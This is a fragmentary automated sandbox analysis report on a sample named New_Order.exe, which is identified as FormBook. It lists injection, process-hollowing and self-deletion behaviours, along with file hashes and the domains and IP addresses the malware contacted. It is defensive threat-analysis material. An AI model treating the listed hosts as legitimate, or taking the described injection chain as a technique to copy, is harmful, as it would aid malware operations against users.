Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A927A mov eax, dword ptr fs:[00000030h]	7_2_048A927A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0491B260 mov eax, dword ptr fs:[00000030h]	7_2_0491B260
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0491B260 mov eax, dword ptr fs:[00000030h]	7_2_0491B260
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04938A62 mov eax, dword ptr fs:[00000030h]	7_2_04938A62
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]	7_2_0488AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]	7_2_0488AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]	7_2_0488AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]	7_2_0488AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]	7_2_0488AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04871B8F mov eax, dword ptr fs:[00000030h]	7_2_04871B8F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04871B8F mov eax, dword ptr fs:[00000030h]	7_2_04871B8F

Enables debug privileges

Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.charmboutiques.com
Source: C:\Windows\explorer.exe	Domain query: www.shanghainternational.com
Source: C:\Windows\explorer.exe	Network Connect: 91.148.168.141 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.voiceclubdubai.com
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.websitemax.co.uk
Source: C:\Windows\explorer.exe	Network Connect: 8.210.40.49 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 150.95.255.38 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.roastedorganic.com
Source: C:\Windows\explorer.exe	Domain query: www.year-action.xyz
Source: C:\Windows\explorer.exe	Domain query: www.susanestuart.com
Source: C:\Windows\explorer.exe	Network Connect: 75.2.115.196 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 62.149.189.71 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.w-c727or.net
Source: C:\Windows\explorer.exe	Domain query: www.kantan-sedori.com
Source: C:\Windows\explorer.exe	Domain query: www.geacasolaro.com
Source: C:\Windows\explorer.exe	Domain query: www.hdjakdhf.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 85.233.160.22 80	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\New_Order.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 3472			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Thread register set: target process: 3472			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\svchost.exe

Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 1260000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\New_Order.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2EEB008

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\New_Order.exe	Process created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'			Jump to behavior

Source: explorer.exe, 00000002.00000000.253797902.0000000005EA0000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000002.00000002.495816911.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\New_Order.exe

0_2_00403348

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

ID:	411746
Product:	CloudBasic
Start time:	06:08:51
Start date:	12.05.2021
Sample:	New_Order.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	74e4eb9afbf8f9c9b285a46ced831979
SHA1:	8d65df9dc971c859f0a86a158d9576f528603410
SHA256:	68c72cdcc504fcbffe3d6219cbeeed9586e0e362f073070eda7c0b4ed962d14a
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\8n7cv9pwr2kwl9	data	3C64776F75B97A4C93D6D618B56A6F34	621734AAB7D0C78F31E2710792CED1ECA8A25A42	15C34F8796FADC9344F3F00A92ABF56576290325A80CA2E1FAE1DFC472FE4AE3
C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	857951253D45E28242D6EFFFF15D2BE6	94BCE2130D6BC960C42023FCFAEC4CFE1578905B	FE179C45D6115D5D7238857C0DFA7D48E24182CF4AC2C9365925DC4EB4BCDA4E
C:\Users\user\AppData\Local\Temp\p4uvvpfyo5r9igyk	data	1842785601112C137E81EA60E9504A13	904245EBB63CF1FF6DF3461026C179A7B1E9083B	CE4A558A3F3B767B8E041794A63587145306752BCB2C990200CD6C48DB3C610E

Analysis Report New_Order.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs